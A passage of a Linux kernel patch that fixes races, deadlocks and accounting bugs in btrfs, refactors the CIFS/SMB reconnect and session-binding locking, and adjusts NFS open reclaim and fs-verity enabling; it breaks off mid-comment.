+index 5ac65384c9471..f8b0548988858 100644
+--- a/fs/btrfs/qgroup.c
++++ b/fs/btrfs/qgroup.c
+@@ -2812,13 +2812,22 @@ cleanup:
+ }
+ 
+ /*
+- * called from commit_transaction. Writes all changed qgroups to disk.
++ * Writes all changed qgroups to disk.
++ * Called by the transaction commit path and the qgroup assign ioctl.
+  */
+ int btrfs_run_qgroups(struct btrfs_trans_handle *trans)
+ {
+ 	struct btrfs_fs_info *fs_info = trans->fs_info;
+ 	int ret = 0;
+ 
++	/*
++	 * In case we are called from the qgroup assign ioctl, assert that we
++	 * are holding the qgroup_ioctl_lock, otherwise we can race with a quota
++	 * disable operation (ioctl) and access a freed quota root.
++	 */
++	if (trans->transaction->state != TRANS_STATE_COMMIT_DOING)
++		lockdep_assert_held(&fs_info->qgroup_ioctl_lock);
++
+ 	if (!fs_info->quota_root)
+ 		return ret;
+ 
+diff --git a/fs/btrfs/space-info.c b/fs/btrfs/space-info.c
+index 65c010159fb5f..c7642c00a65d0 100644
+--- a/fs/btrfs/space-info.c
++++ b/fs/btrfs/space-info.c
+@@ -404,7 +404,7 @@ int btrfs_can_overcommit(struct btrfs_fs_info *fs_info,
+ 		return 0;
+ 
+ 	used = btrfs_space_info_used(space_info, true);
+-	if (test_bit(BTRFS_FS_NO_OVERCOMMIT, &fs_info->flags) &&
++	if (test_bit(BTRFS_FS_ACTIVE_ZONE_TRACKING, &fs_info->flags) &&
+ 	    (space_info->flags & BTRFS_BLOCK_GROUP_METADATA))
+ 		avail = 0;
+ 	else
+diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
+index d1f1da6820fb0..682b463a7633a 100644
+--- a/fs/btrfs/transaction.c
++++ b/fs/btrfs/transaction.c
+@@ -2009,7 +2009,20 @@ static void cleanup_transaction(struct btrfs_trans_handle *trans, int err)
+ 
+ 	if (current->journal_info == trans)
+ 		current->journal_info = NULL;
+-	btrfs_scrub_cancel(fs_info);
++
++	/*
++	 * If relocation is running, we can't cancel scrub because that will
++	 * result in a deadlock. Before relocating a block group, relocation
++	 * pauses scrub, then starts and commits a transaction before unpausing
++	 * scrub. If the transaction commit is being done by the relocation
++	 * task or triggered by another task and the relocation task is waiting
++	 * for the commit, and we end up here due to an error in the commit
++	 * path, then calling btrfs_scrub_cancel() will deadlock, as we are
++	 * asking for scrub to stop while having it asked to be paused higher
++	 * above in relocation code.
++	 */
++	if (!test_bit(BTRFS_FS_RELOC_RUNNING, &fs_info->flags))
++		btrfs_scrub_cancel(fs_info);
+ 
+ 	kmem_cache_free(btrfs_trans_handle_cachep, trans);
+ }
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index f02b8cbd6ec41..67b2aa552d228 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -1379,8 +1379,17 @@ struct btrfs_device *btrfs_scan_one_device(const char *path, fmode_t flags,
+ 	 * So, we need to add a special mount option to scan for
+ 	 * later supers, using BTRFS_SUPER_MIRROR_MAX instead
+ 	 */
+-	flags |= FMODE_EXCL;
+ 
++	/*
++	 * Avoid using flag |= FMODE_EXCL here, as the systemd-udev may
++	 * initiate the device scan which may race with the user's mount
++	 * or mkfs command, resulting in failure.
++	 * Since the device scan is solely for reading purposes, there is
++	 * no need for FMODE_EXCL. Additionally, the devices are read again
++	 * during the mount process. It is ok to get some inconsistent
++	 * values temporarily, as the device paths of the fsid are the only
++	 * required information for assembling the volume.
++	 */
+ 	bdev = blkdev_get_by_path(path, flags, holder);
+ 	if (IS_ERR(bdev))
+ 		return ERR_CAST(bdev);
+@@ -3286,8 +3295,15 @@ int btrfs_relocate_chunk(struct btrfs_fs_info *fs_info, u64 chunk_offset)
+ 	btrfs_scrub_pause(fs_info);
+ 	ret = btrfs_relocate_block_group(fs_info, chunk_offset);
+ 	btrfs_scrub_continue(fs_info);
+-	if (ret)
++	if (ret) {
++		/*
++		 * If we had a transaction abort, stop all running scrubs.
++		 * See transaction.c:cleanup_transaction() why we do it here.
++		 */
++		if (BTRFS_FS_ERROR(fs_info))
++			btrfs_scrub_cancel(fs_info);
+ 		return ret;
++	}
+ 
+ 	block_group = btrfs_lookup_block_group(fs_info, chunk_offset);
+ 	if (!block_group)
+diff --git a/fs/btrfs/zoned.c b/fs/btrfs/zoned.c
+index 1b72004136ef8..e97c5a1ac95d6 100644
+--- a/fs/btrfs/zoned.c
++++ b/fs/btrfs/zoned.c
+@@ -538,8 +538,7 @@ int btrfs_get_dev_zone_info(struct btrfs_device *device, bool populate_cache)
+ 		}
+ 		atomic_set(&zone_info->active_zones_left,
+ 			   max_active_zones - nactive);
+-		/* Overcommit does not work well with active zone tacking. */
+-		set_bit(BTRFS_FS_NO_OVERCOMMIT, &fs_info->flags);
++		set_bit(BTRFS_FS_ACTIVE_ZONE_TRACKING, &fs_info->flags);
+ 	}
+ 
+ 	/* Validate superblock log */
+@@ -1576,9 +1575,19 @@ void btrfs_calc_zone_unusable(struct btrfs_block_group *cache)
+ 		return;
+ 
+ 	WARN_ON(cache->bytes_super != 0);
+-	unusable = (cache->alloc_offset - cache->used) +
+-		   (cache->length - cache->zone_capacity);
+-	free = cache->zone_capacity - cache->alloc_offset;
++
++	/* Check for block groups never get activated */
++	if (test_bit(BTRFS_FS_ACTIVE_ZONE_TRACKING, &cache->fs_info->flags) &&
++	    cache->flags & (BTRFS_BLOCK_GROUP_METADATA | BTRFS_BLOCK_GROUP_SYSTEM) &&
++	    !test_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE, &cache->runtime_flags) &&
++	    cache->alloc_offset == 0) {
++		unusable = cache->length;
++		free = 0;
++	} else {
++		unusable = (cache->alloc_offset - cache->used) +
++			   (cache->length - cache->zone_capacity);
++		free = cache->zone_capacity - cache->alloc_offset;
++	}
+ 
+ 	/* We only need ->free_space in ALLOC_SEQ block groups */
+ 	cache->cached = BTRFS_CACHE_FINISHED;
+@@ -1915,7 +1924,11 @@ bool btrfs_zone_activate(struct btrfs_block_group *block_group)
+ 
+ 	/* Successfully activated all the zones */
+ 	set_bit(BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE, &block_group->runtime_flags);
+-	space_info->active_total_bytes += block_group->length;
++	WARN_ON(block_group->alloc_offset != 0);
++	if (block_group->zone_unusable == block_group->length) {
++		block_group->zone_unusable = block_group->length - block_group->zone_capacity;
++		space_info->bytes_zone_unusable -= block_group->zone_capacity;
++	}
+ 	spin_unlock(&block_group->lock);
+ 	btrfs_try_granting_tickets(fs_info, space_info);
+ 	spin_unlock(&space_info->lock);
+@@ -2278,7 +2291,7 @@ int btrfs_zone_finish_one_bg(struct btrfs_fs_info *fs_info)
+ 		u64 avail;
+ 
+ 		spin_lock(&block_group->lock);
+-		if (block_group->reserved ||
++		if (block_group->reserved || block_group->alloc_offset == 0 ||
+ 		    (block_group->flags & BTRFS_BLOCK_GROUP_SYSTEM)) {
+ 			spin_unlock(&block_group->lock);
+ 			continue;
+diff --git a/fs/cifs/cifsfs.h b/fs/cifs/cifsfs.h
+index 388b745a978e2..b6c38896fb2db 100644
+--- a/fs/cifs/cifsfs.h
++++ b/fs/cifs/cifsfs.h
+@@ -118,7 +118,10 @@ extern const struct dentry_operations cifs_ci_dentry_ops;
+ #ifdef CONFIG_CIFS_DFS_UPCALL
+ extern struct vfsmount *cifs_dfs_d_automount(struct path *path);
+ #else
+-#define cifs_dfs_d_automount NULL
++static inline struct vfsmount *cifs_dfs_d_automount(struct path *path)
++{
++	return ERR_PTR(-EREMOTE);
++}
+ #endif
+ 
+ /* Functions related to symlinks */
+diff --git a/fs/cifs/cifsproto.h b/fs/cifs/cifsproto.h
+index bc4475f6c0827..98513f5af3f96 100644
+--- a/fs/cifs/cifsproto.h
++++ b/fs/cifs/cifsproto.h
+@@ -691,5 +691,6 @@ static inline int cifs_create_options(struct cifs_sb_info *cifs_sb, int options)
+ 
+ struct super_block *cifs_get_tcon_super(struct cifs_tcon *tcon);
+ void cifs_put_tcon_super(struct super_block *sb);
++int cifs_wait_for_server_reconnect(struct TCP_Server_Info *server, bool retry);
+ 
+ #endif			/* _CIFSPROTO_H */
+diff --git a/fs/cifs/cifssmb.c b/fs/cifs/cifssmb.c
+index 6c6a7fc47f3e3..c90d4ec9292ca 100644
+--- a/fs/cifs/cifssmb.c
++++ b/fs/cifs/cifssmb.c
+@@ -70,7 +70,6 @@ cifs_reconnect_tcon(struct cifs_tcon *tcon, int smb_command)
+ 	struct cifs_ses *ses;
+ 	struct TCP_Server_Info *server;
+ 	struct nls_table *nls_codepage;
+-	int retries;
+ 
+ 	/*
+ 	 * SMBs NegProt, SessSetup, uLogoff do not have tcon yet so check for
+@@ -98,45 +97,9 @@ cifs_reconnect_tcon(struct cifs_tcon *tcon, int smb_command)
+ 	}
+ 	spin_unlock(&tcon->tc_lock);
+ 
+-	retries = server->nr_targets;
+-
+-	/*
+-	 * Give demultiplex thread up to 10 seconds to each target available for
+-	 * reconnect -- should be greater than cifs socket timeout which is 7
+-	 * seconds.
+-	 */
+-	while (server->tcpStatus == CifsNeedReconnect) {
+-		rc = wait_event_interruptible_timeout(server->response_q,
+-						      (server->tcpStatus != CifsNeedReconnect),
+-						      10 * HZ);
+-		if (rc < 0) {
+-			cifs_dbg(FYI, "%s: aborting reconnect due to a received signal by the process\n",
+-				 __func__);
+-			return -ERESTARTSYS;
+-		}
+-
+-		/* are we still trying to reconnect? */
+-		spin_lock(&server->srv_lock);
+-		if (server->tcpStatus != CifsNeedReconnect) {
+-			spin_unlock(&server->srv_lock);
+-			break;
+-		}
+-		spin_unlock(&server->srv_lock);
+-
+-		if (retries && --retries)
+-			continue;
+-
+-		/*
+-		 * on "soft" mounts we wait once. Hard mounts keep
+-		 * retrying until process is killed or server comes
+-		 * back on-line
+-		 */
+-		if (!tcon->retry) {
+-			cifs_dbg(FYI, "gave up waiting on reconnect in smb_init\n");
+-			return -EHOSTDOWN;
+-		}
+-		retries = server->nr_targets;
+-	}
++	rc = cifs_wait_for_server_reconnect(server, tcon->retry);
++	if (rc)
++		return rc;
+ 
+ 	spin_lock(&ses->chan_lock);
+ 	if (!cifs_chan_needs_reconnect(ses, server) && !tcon->need_reconnect) {
+@@ -4356,8 +4319,13 @@ CIFSGetDFSRefer(const unsigned int xid, struct cifs_ses *ses,
+ 		return -ENODEV;
+ 
+ getDFSRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, ses->tcon_ipc, (void **) &pSMB,
+-		      (void **) &pSMBr);
++	/*
++	 * Use smb_init_no_reconnect() instead of smb_init() as
++	 * CIFSGetDFSRefer() may be called from cifs_reconnect_tcon() and thus
++	 * causing an infinite recursion.
++	 */
++	rc = smb_init_no_reconnect(SMB_COM_TRANSACTION2, 15, ses->tcon_ipc,
++				   (void **)&pSMB, (void **)&pSMBr);
+ 	if (rc)
+ 		return rc;
+ 
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index 7aecb1646b6fc..077c88c49dfdf 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -261,31 +261,42 @@ cifs_mark_tcp_ses_conns_for_reconnect(struct TCP_Server_Info *server,
+ 			cifs_chan_update_iface(ses, server);
+ 
+ 		spin_lock(&ses->chan_lock);
+-		if (!mark_smb_session && cifs_chan_needs_reconnect(ses, server))
+-			goto next_session;
++		if (!mark_smb_session && cifs_chan_needs_reconnect(ses, server)) {
++			spin_unlock(&ses->chan_lock);
++			continue;
++		}
+ 
+ 		if (mark_smb_session)
+ 			CIFS_SET_ALL_CHANS_NEED_RECONNECT(ses);
+ 		else
+ 			cifs_chan_set_need_reconnect(ses, server);
+ 
++		cifs_dbg(FYI, "%s: channel connect bitmap: 0x%lx\n",
++			 __func__, ses->chans_need_reconnect);
++
+ 		/* If all channels need reconnect, then tcon needs reconnect */
+-		if (!mark_smb_session && !CIFS_ALL_CHANS_NEED_RECONNECT(ses))
+-			goto next_session;
++		if (!mark_smb_session && !CIFS_ALL_CHANS_NEED_RECONNECT(ses)) {
++			spin_unlock(&ses->chan_lock);
++			continue;
++		}
++		spin_unlock(&ses->chan_lock);
+ 
++		spin_lock(&ses->ses_lock);
+ 		ses->ses_status = SES_NEED_RECON;
++		spin_unlock(&ses->ses_lock);
+ 
+ 		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+ 			tcon->need_reconnect = true;
++			spin_lock(&tcon->tc_lock);
+ 			tcon->status = TID_NEED_RECON;
++			spin_unlock(&tcon->tc_lock);
+ 		}
+ 		if (ses->tcon_ipc) {
+ 			ses->tcon_ipc->need_reconnect = true;
++			spin_lock(&ses->tcon_ipc->tc_lock);
+ 			ses->tcon_ipc->status = TID_NEED_RECON;
++			spin_unlock(&ses->tcon_ipc->tc_lock);
+ 		}
+-
+-next_session:
+-		spin_unlock(&ses->chan_lock);
+ 	}
+ 	spin_unlock(&cifs_tcp_ses_lock);
+ }
+@@ -4050,11 +4061,19 @@ cifs_negotiate_protocol(const unsigned int xid, struct cifs_ses *ses,
+ 
+ 	/* only send once per connect */
+ 	spin_lock(&server->srv_lock);
+-	if (!server->ops->need_neg(server) ||
++	if (server->tcpStatus != CifsGood &&
++	    server->tcpStatus != CifsNew &&
+ 	    server->tcpStatus != CifsNeedNegotiate) {
++		spin_unlock(&server->srv_lock);
++		return -EHOSTDOWN;
++	}
++
++	if (!server->ops->need_neg(server) &&
++	    server->tcpStatus == CifsGood) {
+ 		spin_unlock(&server->srv_lock);
+ 		return 0;
+ 	}
++
+ 	server->tcpStatus = CifsInNegotiate;
+ 	spin_unlock(&server->srv_lock);
+ 
+@@ -4082,39 +4101,48 @@ cifs_setup_session(const unsigned int xid, struct cifs_ses *ses,
+ 		   struct nls_table *nls_info)
+ {
+ 	int rc = -ENOSYS;
+-	struct sockaddr_in6 *addr6 = (struct sockaddr_in6 *)&server->dstaddr;
+-	struct sockaddr_in *addr = (struct sockaddr_in *)&server->dstaddr;
++	struct TCP_Server_Info *pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++	struct sockaddr_in6 *addr6 = (struct sockaddr_in6 *)&pserver->dstaddr;
++	struct sockaddr_in *addr = (struct sockaddr_in *)&pserver->dstaddr;
+ 	bool is_binding = false;
+ 
+ 	spin_lock(&ses->ses_lock);
+-	if (server->dstaddr.ss_family == AF_INET6)
+-		scnprintf(ses->ip_addr, sizeof(ses->ip_addr), "%pI6", &addr6->sin6_addr);
+-	else
+-		scnprintf(ses->ip_addr, sizeof(ses->ip_addr), "%pI4", &addr->sin_addr);
++	cifs_dbg(FYI, "%s: channel connect bitmap: 0x%lx\n",
++		 __func__, ses->chans_need_reconnect);
+ 
+ 	if (ses->ses_status != SES_GOOD &&
+ 	    ses->ses_status != SES_NEW &&
+ 	    ses->ses_status != SES_NEED_RECON) {
+ 		spin_unlock(&ses->ses_lock);
+-		return 0;
++		return -EHOSTDOWN;
+ 	}
+ 
+ 	/* only send once per connect */
+ 	spin_lock(&ses->chan_lock);
+-	if (CIFS_ALL_CHANS_GOOD(ses) ||
+-	    cifs_chan_in_reconnect(ses, server)) {
++	if (CIFS_ALL_CHANS_GOOD(ses)) {
++		if (ses->ses_status == SES_NEED_RECON)
++			ses->ses_status = SES_GOOD;
+ 		spin_unlock(&ses->chan_lock);
+ 		spin_unlock(&ses->ses_lock);
+ 		return 0;
+ 	}
+-	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
++
+ 	cifs_chan_set_in_reconnect(ses, server);
++	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
+ 	spin_unlock(&ses->chan_lock);
+ 
+ 	if (!is_binding)
+ 		ses->ses_status = SES_IN_SETUP;
+ 	spin_unlock(&ses->ses_lock);
+ 
++	/* update ses ip_addr only for primary chan */
++	if (server == pserver) {
++		if (server->dstaddr.ss_family == AF_INET6)
++			scnprintf(ses->ip_addr, sizeof(ses->ip_addr), "%pI6", &addr6->sin6_addr);
++		else
++			scnprintf(ses->ip_addr, sizeof(ses->ip_addr), "%pI4", &addr->sin_addr);
++	}
++
+ 	if (!is_binding) {
+ 		ses->capabilities = server->capabilities;
+ 		if (!linuxExtEnabled)
+diff --git a/fs/cifs/misc.c b/fs/cifs/misc.c
+index 4e54736a06996..832856aef4b7a 100644
+--- a/fs/cifs/misc.c
++++ b/fs/cifs/misc.c
+@@ -1382,3 +1382,47 @@ int cifs_inval_name_dfs_link_error(const unsigned int xid,
+ 	return 0;
+ }
+ #endif
++
++int cifs_wait_for_server_reconnect(struct TCP_Server_Info *server, bool retry)
++{
++	int timeout = 10;
++	int rc;
++
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus != CifsNeedReconnect) {
++		spin_unlock(&server->srv_lock);
++		return 0;
++	}
++	timeout *= server->nr_targets;
++	spin_unlock(&server->srv_lock);
++
++	/*
++	 * Give demultiplex thread up to 10 seconds to each target available for
++	 * reconnect -- should be greater than cifs socket timeout which is 7
++	 * seconds.
++	 *
++	 * On "soft" mounts we wait once. Hard mounts keep retrying until
++	 * process is killed or server comes back on-line.
++	 */
++	do {
++		rc = wait_event_interruptible_timeout(server->response_q,
++						      (server->tcpStatus != CifsNeedReconnect),
++						      timeout * HZ);
++		if (rc < 0) {
++			cifs_dbg(FYI, "%s: aborting reconnect due to received signal\n",
++				 __func__);
++			return -ERESTARTSYS;
++		}
++
++		/* are we still trying to reconnect? */
++		spin_lock(&server->srv_lock);
++		if (server->tcpStatus != CifsNeedReconnect) {
++			spin_unlock(&server->srv_lock);
++			return 0;
++		}
++		spin_unlock(&server->srv_lock);
++	} while (retry);
++
++	cifs_dbg(FYI, "%s: gave up waiting on reconnect\n", __func__);
++	return -EHOSTDOWN;
++}
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+index 6e6e44d8b4c79..b37379b62cc77 100644
+--- a/fs/cifs/smb2pdu.c
++++ b/fs/cifs/smb2pdu.c
+@@ -139,72 +139,12 @@ out:
+ 	return;
+ }
+ 
+-static int wait_for_server_reconnect(struct TCP_Server_Info *server,
+-				     __le16 smb2_command, bool retry)
+-{
+-	int timeout = 10;
+-	int rc;
+-
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus != CifsNeedReconnect) {
+-		spin_unlock(&server->srv_lock);
+-		return 0;
+-	}
+-	timeout *= server->nr_targets;
+-	spin_unlock(&server->srv_lock);
+-
+-	/*
+-	 * Return to caller for TREE_DISCONNECT and LOGOFF and CLOSE
+-	 * here since they are implicitly done when session drops.
+-	 */
+-	switch (smb2_command) {
+-	/*
+-	 * BB Should we keep oplock break and add flush to exceptions?
+-	 */
+-	case SMB2_TREE_DISCONNECT:
+-	case SMB2_CANCEL:
+-	case SMB2_CLOSE:
+-	case SMB2_OPLOCK_BREAK:
+-		return -EAGAIN;
+-	}
+-
+-	/*
+-	 * Give demultiplex thread up to 10 seconds to each target available for
+-	 * reconnect -- should be greater than cifs socket timeout which is 7
+-	 * seconds.
+-	 *
+-	 * On "soft" mounts we wait once. Hard mounts keep retrying until
+-	 * process is killed or server comes back on-line.
+-	 */
+-	do {
+-		rc = wait_event_interruptible_timeout(server->response_q,
+-						      (server->tcpStatus != CifsNeedReconnect),
+-						      timeout * HZ);
+-		if (rc < 0) {
+-			cifs_dbg(FYI, "%s: aborting reconnect due to received signal\n",
+-				 __func__);
+-			return -ERESTARTSYS;
+-		}
+-
+-		/* are we still trying to reconnect? */
+-		spin_lock(&server->srv_lock);
+-		if (server->tcpStatus != CifsNeedReconnect) {
+-			spin_unlock(&server->srv_lock);
+-			return 0;
+-		}
+-		spin_unlock(&server->srv_lock);
+-	} while (retry);
+-
+-	cifs_dbg(FYI, "%s: gave up waiting on reconnect\n", __func__);
+-	return -EHOSTDOWN;
+-}
+-
+ static int
+ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	       struct TCP_Server_Info *server)
+ {
+ 	int rc = 0;
+-	struct nls_table *nls_codepage;
++	struct nls_table *nls_codepage = NULL;
+ 	struct cifs_ses *ses;
+ 
+ 	/*
+@@ -239,7 +179,28 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	    (!tcon->ses->server) || !server)
+ 		return -EIO;
+ 
+-	rc = wait_for_server_reconnect(server, smb2_command, tcon->retry);
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsNeedReconnect) {
++		/*
++		 * Return to caller for TREE_DISCONNECT and LOGOFF and CLOSE
++		 * here since they are implicitly done when session drops.
++		 */
++		switch (smb2_command) {
++		/*
++		 * BB Should we keep oplock break and add flush to exceptions?
++		 */
++		case SMB2_TREE_DISCONNECT:
++		case SMB2_CANCEL:
++		case SMB2_CLOSE:
++		case SMB2_OPLOCK_BREAK:
++			spin_unlock(&server->srv_lock);
++			return -EAGAIN;
++		}
++	}
++	spin_unlock(&server->srv_lock);
++
++again:
++	rc = cifs_wait_for_server_reconnect(server, tcon->retry);
+ 	if (rc)
+ 		return rc;
+ 
+@@ -255,8 +216,7 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 		 tcon->ses->chans_need_reconnect,
+ 		 tcon->need_reconnect);
+ 
+-	nls_codepage = load_nls_default();
+-
++	mutex_lock(&ses->session_mutex);
+ 	/*
+ 	 * Recheck after acquire mutex. If another thread is negotiating
+ 	 * and the server never sends an answer the socket will be closed
+@@ -265,28 +225,38 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	spin_lock(&server->srv_lock);
+ 	if (server->tcpStatus == CifsNeedReconnect) {
+ 		spin_unlock(&server->srv_lock);
++		mutex_unlock(&ses->session_mutex);
++
++		if (tcon->retry)
++			goto again;
++
+ 		rc = -EHOSTDOWN;
+ 		goto out;
+ 	}
+ 	spin_unlock(&server->srv_lock);
+ 
++	nls_codepage = load_nls_default();
++
+ 	/*
+ 	 * need to prevent multiple threads trying to simultaneously
+ 	 * reconnect the same SMB session
+ 	 */
++	spin_lock(&ses->ses_lock);
+ 	spin_lock(&ses->chan_lock);
+-	if (!cifs_chan_needs_reconnect(ses, server)) {
++	if (!cifs_chan_needs_reconnect(ses, server) &&
++	    ses->ses_status == SES_GOOD) {
+ 		spin_unlock(&ses->chan_lock);
+-
++		spin_unlock(&ses->ses_lock);
+ 		/* this means that we only need to tree connect */
+ 		if (tcon->need_reconnect)
+ 			goto skip_sess_setup;
+ 
++		mutex_unlock(&ses->session_mutex);
+ 		goto out;
+ 	}
+ 	spin_unlock(&ses->chan_lock);
++	spin_unlock(&ses->ses_lock);
+ 
+-	mutex_lock(&ses->session_mutex);
+ 	rc = cifs_negotiate_protocol(0, ses, server);
+ 	if (!rc) {
+ 		rc = cifs_setup_session(0, ses, server, nls_codepage);
+@@ -302,10 +272,8 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 		mutex_unlock(&ses->session_mutex);
+ 		goto out;
+ 	}
+-	mutex_unlock(&ses->session_mutex);
+ 
+ skip_sess_setup:
+-	mutex_lock(&ses->session_mutex);
+ 	if (!tcon->need_reconnect) {
+ 		mutex_unlock(&ses->session_mutex);
+ 		goto out;
+@@ -320,7 +288,7 @@ skip_sess_setup:
+ 	cifs_dbg(FYI, "reconnect tcon rc = %d\n", rc);
+ 	if (rc) {
+ 		/* If sess reconnected but tcon didn't, something strange ... */
+-		pr_warn_once("reconnect tcon failed rc = %d\n", rc);
++		cifs_dbg(VFS, "reconnect tcon failed rc = %d\n", rc);
+ 		goto out;
+ 	}
+ 
+@@ -1292,9 +1260,9 @@ SMB2_sess_alloc_buffer(struct SMB2_sess_data *sess_data)
+ 	if (rc)
+ 		return rc;
+ 
+-	spin_lock(&ses->chan_lock);
+-	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
+-	spin_unlock(&ses->chan_lock);
++	spin_lock(&ses->ses_lock);
++	is_binding = (ses->ses_status == SES_GOOD);
++	spin_unlock(&ses->ses_lock);
+ 
+ 	if (is_binding) {
+ 		req->hdr.SessionId = cpu_to_le64(ses->Suid);
+@@ -1452,9 +1420,9 @@ SMB2_auth_kerberos(struct SMB2_sess_data *sess_data)
+ 		goto out_put_spnego_key;
+ 	}
+ 
+-	spin_lock(&ses->chan_lock);
+-	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
+-	spin_unlock(&ses->chan_lock);
++	spin_lock(&ses->ses_lock);
++	is_binding = (ses->ses_status == SES_GOOD);
++	spin_unlock(&ses->ses_lock);
+ 
+ 	/* keep session key if binding */
+ 	if (!is_binding) {
+@@ -1578,9 +1546,9 @@ SMB2_sess_auth_rawntlmssp_negotiate(struct SMB2_sess_data *sess_data)
+ 
+ 	cifs_dbg(FYI, "rawntlmssp session setup challenge phase\n");
+ 
+-	spin_lock(&ses->chan_lock);
+-	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
+-	spin_unlock(&ses->chan_lock);
++	spin_lock(&ses->ses_lock);
++	is_binding = (ses->ses_status == SES_GOOD);
++	spin_unlock(&ses->ses_lock);
+ 
+ 	/* keep existing ses id and flags if binding */
+ 	if (!is_binding) {
+@@ -1646,9 +1614,9 @@ SMB2_sess_auth_rawntlmssp_authenticate(struct SMB2_sess_data *sess_data)
+ 
+ 	rsp = (struct smb2_sess_setup_rsp *)sess_data->iov[0].iov_base;
+ 
+-	spin_lock(&ses->chan_lock);
+-	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
+-	spin_unlock(&ses->chan_lock);
++	spin_lock(&ses->ses_lock);
++	is_binding = (ses->ses_status == SES_GOOD);
++	spin_unlock(&ses->ses_lock);
+ 
+ 	/* keep existing ses id and flags if binding */
+ 	if (!is_binding) {
+diff --git a/fs/cifs/smb2transport.c b/fs/cifs/smb2transport.c
+index d827b7547ffad..790acf65a0926 100644
+--- a/fs/cifs/smb2transport.c
++++ b/fs/cifs/smb2transport.c
+@@ -81,6 +81,7 @@ int smb2_get_sign_key(__u64 ses_id, struct TCP_Server_Info *server, u8 *key)
+ 	struct cifs_ses *ses = NULL;
+ 	int i;
+ 	int rc = 0;
++	bool is_binding = false;
+ 
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 
+@@ -97,9 +98,12 @@ int smb2_get_sign_key(__u64 ses_id, struct TCP_Server_Info *server, u8 *key)
+ 	goto out;
+ 
+ found:
++	spin_lock(&ses->ses_lock);
+ 	spin_lock(&ses->chan_lock);
+-	if (cifs_chan_needs_reconnect(ses, server) &&
+-	    !CIFS_ALL_CHANS_NEED_RECONNECT(ses)) {
++
++	is_binding = (cifs_chan_needs_reconnect(ses, server) &&
++		      ses->ses_status == SES_GOOD);
++	if (is_binding) {
+ 		/*
+ 		 * If we are in the process of binding a new channel
+ 		 * to an existing session, use the master connection
+@@ -107,6 +111,7 @@ found:
+ 		 */
+ 		memcpy(key, ses->smb3signingkey, SMB3_SIGN_KEY_SIZE);
+ 		spin_unlock(&ses->chan_lock);
++		spin_unlock(&ses->ses_lock);
+ 		goto out;
+ 	}
+ 
+@@ -119,10 +124,12 @@ found:
+ 		if (chan->server == server) {
+ 			memcpy(key, chan->signkey, SMB3_SIGN_KEY_SIZE);
+ 			spin_unlock(&ses->chan_lock);
++			spin_unlock(&ses->ses_lock);
+ 			goto out;
+ 		}
+ 	}
+ 	spin_unlock(&ses->chan_lock);
++	spin_unlock(&ses->ses_lock);
+ 
+ 	cifs_dbg(VFS,
+ 		 "%s: Could not find channel signing key for session 0x%llx\n",
+@@ -392,11 +399,15 @@ generate_smb3signingkey(struct cifs_ses *ses,
+ 	bool is_binding = false;
+ 	int chan_index = 0;
+ 
++	spin_lock(&ses->ses_lock);
+ 	spin_lock(&ses->chan_lock);
+-	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
++	is_binding = (cifs_chan_needs_reconnect(ses, server) &&
++		      ses->ses_status == SES_GOOD);
++
+ 	chan_index = cifs_ses_get_chan_index(ses, server);
+ 	/* TODO: introduce ref counting for channels when the can be freed */
+ 	spin_unlock(&ses->chan_lock);
++	spin_unlock(&ses->ses_lock);
+ 
+ 	/*
+ 	 * All channels use the same encryption/decryption keys but
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index d70da78e698d2..70e76359909cc 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -1980,8 +1980,7 @@ _nfs4_opendata_reclaim_to_nfs4_state(struct nfs4_opendata *data)
+ 	if (!data->rpc_done) {
+ 		if (data->rpc_status)
+ 			return ERR_PTR(data->rpc_status);
+-		/* cached opens have already been processed */
+-		goto update;
++		return nfs4_try_open_cached(data);
+ 	}
+ 
+ 	ret = nfs_refresh_inode(inode, &data->f_attr);
+@@ -1990,7 +1989,7 @@ _nfs4_opendata_reclaim_to_nfs4_state(struct nfs4_opendata *data)
+ 
+ 	if (data->o_res.delegation_type != 0)
+ 		nfs4_opendata_check_deleg(data, state);
+-update:
++
+ 	if (!update_open_stateid(state, &data->o_res.stateid,
+ 				NULL, data->o_arg.fmode))
+ 		return ERR_PTR(-EAGAIN);
+diff --git a/fs/verity/enable.c b/fs/verity/enable.c
+index df6b499bf6a14..400c264bf8930 100644
+--- a/fs/verity/enable.c
++++ b/fs/verity/enable.c
+@@ -390,25 +390,27 @@ int fsverity_ioctl_enable(struct file *filp, const void __user *uarg)
+ 		goto out_drop_write;
+ 
+ 	err = enable_verity(filp, &arg);
+-	if (err)
+-		goto out_allow_write_access;
+ 
+ 	/*
+-	 * Some pages of the file may have been evicted from pagecache after
+-	 * being used in the Merkle tree construction, then read into pagecache
+-	 * again by another process reading from the file concurrently.  Since
+-	 * these pages didn't undergo verification against the file digest which
